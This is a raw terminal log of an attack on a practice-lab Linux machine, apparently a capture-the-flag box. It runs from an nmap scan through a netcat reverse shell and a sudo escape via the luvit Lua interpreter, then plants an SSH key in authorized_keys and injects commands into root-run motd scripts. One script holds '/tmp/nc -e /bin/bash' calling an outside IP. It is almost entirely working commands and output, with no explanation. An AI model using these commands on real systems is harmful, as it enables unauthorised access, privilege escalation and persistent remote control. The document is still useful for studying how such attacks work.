# Nmap 7.80 scan initiated Mon Mar 23 10:20:21 2020 as: nmap -sC -sV -oN ippsec_scan.txt 10.10.10.181
Nmap scan report for 10.10.10.181
Host is up (0.37s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 96:25:51:8e:6c:83:07:48:ce:11:4b:1f:e5:6d:8a:28 (RSA)
|   256 54:bd:46:71:14:bd:b2:42:a1:b6:b0:2d:94:14:3b:0d (ECDSA)
|_  256 4d:c3:f8:52:b8:85:ec:9c:3e:4d:57:2c:4a:82:fd:86 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Help us
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Mar 23 10:21:10 2020 -- 1 IP address (1 host up) scanned in 49.24 seconds

$ nc -lvvp 4444
listening on [any] 4444 ...
10.10.10.181: inverse host lookup failed: Unknown host
connect to [10.10.16.99] from (UNKNOWN) [10.10.10.181] 33430
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=1000(webadmin) gid=1000(webadmin) groups=1000(webadmin),24(cdrom),30(dip),46(plugdev),111(lpadmin),112(sambashare)
$ cd /home/webadmin
$ ls -la
total 44
drwxr-x--- 5 webadmin sysadmin 4096 Mar 16 04:03 .
drwxr-xr-x 4 root     root     4096 Aug 25  2019 ..
-rw------- 1 webadmin webadmin  105 Mar 16 04:03 .bash_history
-rw-r--r-- 1 webadmin webadmin  220 Aug 23  2019 .bash_logout
-rw-r--r-- 1 webadmin webadmin 3771 Aug 23  2019 .bashrc
drwx------ 2 webadmin webadmin 4096 Aug 23  2019 .cache
drwxrwxr-x 3 webadmin webadmin 4096 Aug 24  2019 .local
-rw-rw-r-- 1 webadmin webadmin    1 Aug 25  2019 .luvit_history
-rw-r--r-- 1 webadmin webadmin  807 Aug 23  2019 .profile
drwxrwxr-x 2 webadmin webadmin 4096 Feb 27 06:29 .ssh
-rw-rw-r-- 1 sysadmin sysadmin  122 Mar 16 03:53 note.txt

$ cat note.txt
- sysadmin -
I have left a tool to practice Lua.
I'm sure you know where to find it.
Contact me if you have any question.
$ cat .bash_history
ls -la
sudo -l
nano privesc.lua
sudo -u sysadmin /home/sysadmin/luvit privesc.lua 
rm privesc.lua
logout

$ echo 'os.execute("/bin/sh")' > privesc.lua
$ cat privesc.lua
os.execute("/bin/sh")
$sudo -u sysadmin /home/sysadmin/luvit privesc.lua
sh: turning off NDELAY mode

$ id
uid=1001(sysadmin) gid=1001(sysadmin) groups=1001(sysadmin)
cd /home/sysadmin 
ls
luvit
user.txt

2020/03/23 21:11:01 CMD: UID=0    PID=2273   | sleep 30 
2020/03/23 21:11:01 CMD: UID=0    PID=2272   | /bin/sh -c sleep 30 ; /bin/cp /var/backups/.update-motd.d/* /etc/update-motd.d/ 
2020/03/23 21:11:01 CMD: UID=0    PID=2271   | 
2020/03/23 21:11:01 CMD: UID=0    PID=2270   | /usr/sbin/CRON -f 
2020/03/23 21:11:01 CMD: UID=0    PID=2269   | /usr/sbin/CRON -f 
2020/03/23 21:11:31 CMD: UID=0    PID=2275   | /bin/cp /var/backups/.update-motd.d/00-header /var/backups/.update-motd.d/10-help-text /var/backups/.update-motd.d/50-motd-news /var/backups/.update-motd.d/80-esm
 /var/backups/.update-motd.d/91-release-upgrade /etc/update-motd.d/ 
2020/03/23 21:12:02 CMD: UID=0    PID=2281   | sleep 30 
2020/03/23 21:12:02 CMD: UID=0    PID=2278   | /bin/sh -c sleep 30 ; /bin/cp /var/backups/.update-motd.d/* /etc/update-motd.d/ 
2020/03/23 21:12:02 CMD: UID=0    PID=2277   | 
2020/03/23 21:12:02 CMD: UID=0    PID=2276   | /usr/sbin/CRON -f 
2020/03/23 21:12:32 CMD: UID=0    PID=2282   | /bin/cp /var/backups/.update-motd.d/00-header /var/backups/.update-motd.d/10-help-text /var/backups/.update-motd.d/50-motd-news /var/backups/.update-motd.d/80-esm
 /var/backups/.update-motd.d/91-release-upgrade /etc/update-motd.d/

$ echo ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC6zGx1XQHjBj5x5D+qqE+0wml2VnALfbz7D5CpexgNrpEDQTOWCEkIAl1Ftt9FNClzdNk+/NFMWXR8dxRHzOl7aQzMa+njQOzh6VyM34YbCGuGgakDCIrsHu25dAwypvJ7Clp22faDDIw6zJxcx84Ir1XSpUeWZ4Cotk+0gVzwg
LHbstRPxyzxROvcsesx9kd251L3/bWJzC53oNDaSXzMBYV7sdjSlPLeD9zHJ39wr5YaEFwn0vkgPR+VAdlXAOLi98Ttr+FYMsGr8XMbJU06QKZ2ozf6RVjc6RJ5hjgIFbcxV8VCNGM6rBx5FDCZDgnbzu4ITWpWsgBBLu3JndjD+UWkeejLE4K7eR3510W/x4zHF/0TsZicyh/ZJb
ZEo+JefvVKT0WAilaJ2K7w7jDkrPhZO6TheGTDnvLqrEvHObGq70ytpZ6ippsm78/xkwCHu4l03RMd2Zt+7elXOsA/4WsjEvS+CxqlbtTC636+T6T4cTro2GHlO3lAq7oddq0= kali@kali >> /home/webadmin/.ssh/authorized_keys

$ cd /etc/update-motd.d/
$ echo "cat /root/root.txt" >> 00-header

$ ssh -i id_rsa webadmin@10.10.10.181
#################################
-------- OWNED BY XH4H  ---------
- I guess stuff could have been configured better ^^ -
#################################
Welcome to Xh4H land

cf6c[---------------------------]aefc

Last login: Mon Mar 16 03:50:24 2020 from 10.10.14.2

#!/bin/sh
/tmp/nc -e /bin/bash 10.10.14.194 2345
# if the current release is under development there won't be a new one
if [ "$(lsb_release -sd | cut -d' ' -f4)" = "(development" ]; then
    exit 0
fi
if [ -x /usr/lib/ubuntu-release-upgrader/release-upgrade-motd ]; then
    exec /usr/lib/ubuntu-release-upgrader/release-upgrade-motd
fi